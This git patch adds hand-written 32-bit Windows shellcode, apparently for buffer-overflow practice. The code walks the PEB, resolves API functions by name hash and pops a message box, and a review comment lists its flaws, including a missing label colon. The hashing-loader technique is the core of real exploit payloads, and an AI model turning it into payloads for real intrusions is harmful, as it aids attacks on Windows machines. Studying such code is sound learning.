From 5f0de55663ff1c3329de0b824fc3c7ea9f35400d Mon Sep 17 00:00:00 2001
From: AceVest
Date: Sun, 24 Jul 2016 17:41:02 +0800
Subject: [PATCH] add shellcode
---
 learn/doc/vimrc | 13 ++--
 learn/test/overflow/cof.asm | 115 ++++++++++++++++++++++++++++++++++++
 2 files changed, 124 insertions(+), 4 deletions(-)
 create mode 100644 learn/test/overflow/cof.asm
diff --git a/learn/doc/vimrc b/learn/doc/vimrc
index a298c7e..851a41e 100644
--- a/learn/doc/vimrc
+++ b/learn/doc/vimrc
@@ -101,9 +101,14 @@ set nobomb
 "
 "autocmd FileType php,python,c,java,perl,shell,bash,vim,ruby,cpp set sts=4
 "golang默认使用TAB
-autocmd FileType go set ai
-autocmd FileType go set tabstop=4
-autocmd FileType go set shiftwidth=4
-autocmd FileType go set noexpandtab
+"autocmd FileType go set ai
+"autocmd FileType go set tabstop=4
+"autocmd FileType go set shiftwidth=4
+"autocmd FileType go set noexpandtab
+
+autocmd FileType asm set ai
+autocmd FileType asm set tabstop=4
+autocmd FileType asm set shiftwidth=4
+autocmd FileType asm set expandtab
 imap jj " 连续按两次jj表示按ESC,进入命令模式
diff --git a/learn/test/overflow/cof.asm b/learn/test/overflow/cof.asm
new file mode 100644
index 0000000..65b8932
--- /dev/null
+++ b/learn/test/overflow/cof.asm
@@ -0,0 +1,115 @@
+_main:
+ ;INT3
+ CLD
+
+ PUSH 0xFFFFFFFF
+ PUSH 0x1E380A6A ; hash of MessageBoxA
+ PUSH 0x4FD18963 ; hash of ExitProcess
+ PUSH 0x0C917432 ; hash of LoadLibraryA
+
+
+ XOR EAX, EAX
+ XOR EDI, EDI
+ MOV EAX, [FS:EAX + 0x30] ; PEB = TEB + 0x30
+ MOV EAX, [EAX + 0x0C] ; PEB_LDR_DATA
+ MOV EAX, [EAX + 0x1C] ; InInitializationOrderModuleList
+ MOV EAX, [EAX] ; Module Kernel32.dll; next 指针在首4字节
+ MOV EBP, [EAX + 0x08] ; BaseAddr of Kernel32.dll
+
+load_next_func_hash:
+ POP EBX
+
+ CMP EBX, 0xFFFFFFFF
+ JE load_func_finish
+
+ CMP EBX, 0x1E380A6A
+ JNE skip_load_library
+
+ PUSH 0x3233 ; '\0\023'
+ PUSH 0x72657375 ; 'resu'
+ PUSH ESP
+ LEA EAX, [ESP + 0x10]
+ MOV EAX, [EAX]
+ CALL EAX
+ ADD ESP, 8
+
+
+ XCHG EAX, EBP ; EBP -> user32.dll BaseAddr
+
+skip_load_library:
+ PUSHAD
+
+ MOV ECX, [EBP + 0x3C] ; Offset of PE Header
+ ADD ECX, EBP ; Address of PE Header
+
+ MOV ECX, [ECX + 0x78] ; Offset of Export Table
+ ADD ECX, EBP ; Address of Export Table
+
+
+ MOV EDI, -1
+
+compare_next_func:
+
+ INC EDI
+
+ MOV ESI, [ECX + 0x20] ; Offset of Names Table
+ ADD ESI, EBP ; Address of Names Table
+
+ MOV ESI, [ESI + EDI*4] ; Offset of Function Name
+ ADD ESI, EBP ; Address of Function Name
+
+ CDQ
+
+get_func_hash:
+ MOVSX EAX, BYTE [ESI]
+ CMP AL, AH
+ JZ compare_hash
+ ROR EDX, 7
+ ADD EDX, EAX
+ INC ESI
+ JMP get_func_hash
+
+compare_hash
+ CMP EDX, EBX
+ JNZ compare_next_func
+
+ MOV ESI, [ECX + 0x24] ; Offset of Ordinal Table
+ ADD ESI, EBP ; Address of Ordinal Table
+
+ XOR EAX, EAX
+ MOV AX, [ESI + 2*EDI]
+ MOV EDI, EAX
+
+
+ MOV ESI, [ECX + 0x1C] ; Offset of Address Table
+ ADD ESI, EBP ; Address of Address Table
+
+ MOV EAX, [ESI + 4*EDI]
+ ADD EAX, EBP
+
+ POP EDI
+ PUSH EAX
+ POPAD
+ LEA EAX, [ESP+0x0C]
+ MOV [EAX], EDI
+
+ JMP load_next_func_hash
+
+load_func_finish:
+ ;INT3
+ MOV EDI, ESP
+
+ XOR EAX, EAX
+ PUSH EAX
+ PUSH 0x74736556 ; 'tseV'
+ PUSH 0x2E656341 ; '.ecA'
+ MOV EBX, ESP
+ PUSH EAX
+ PUSH EBX
+ PUSH EBX
+ PUSH EAX
+ CALL [EDI + 8] ; MessageBoxA('Ace.Vest')
+
+ XOR EAX, EAX
+ PUSH EAX
+ CALL [EDI + 4] ; ExitProcess(0)
-- 
2.44.0
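Review bot: The `compare_hash` label in the middle of the hunk has no trailing colon, unlike every other label in the file; NASM only warns about a label alone on a line without a colon and other assemblers reject it outright, so write `compare_hash:`. The file also lacks the header a reader needs: there is no `BITS 32`, no statement that this is NASM/Intel syntax for 32-bit Windows, and no note that the calls use the stdcall convention where the callee pops its arguments, which is why `ADD ESP, 8` after `CALL EAX` only removes the two string dwords and not the `PUSH ESP` argument. Each resolved address is stored through `MOV [EAX], EDI` with `EAX = ESP+0x0C`, which on the first pass is the slot directly above the four pushed values — the caller's return-address slot if `_main` is entered via `call`; that is only harmless because the code exits through ExitProcess and never returns, and a comment on the `LEA EAX, [ESP+0x0C]` line should say so. The comment `; Module Kernel32.dll` on `MOV EAX, [EAX]` presents the position of kernel32 in InInitializationOrderModuleList as a fact, but that ordering is an assumption about the target Windows version and should be documented as one.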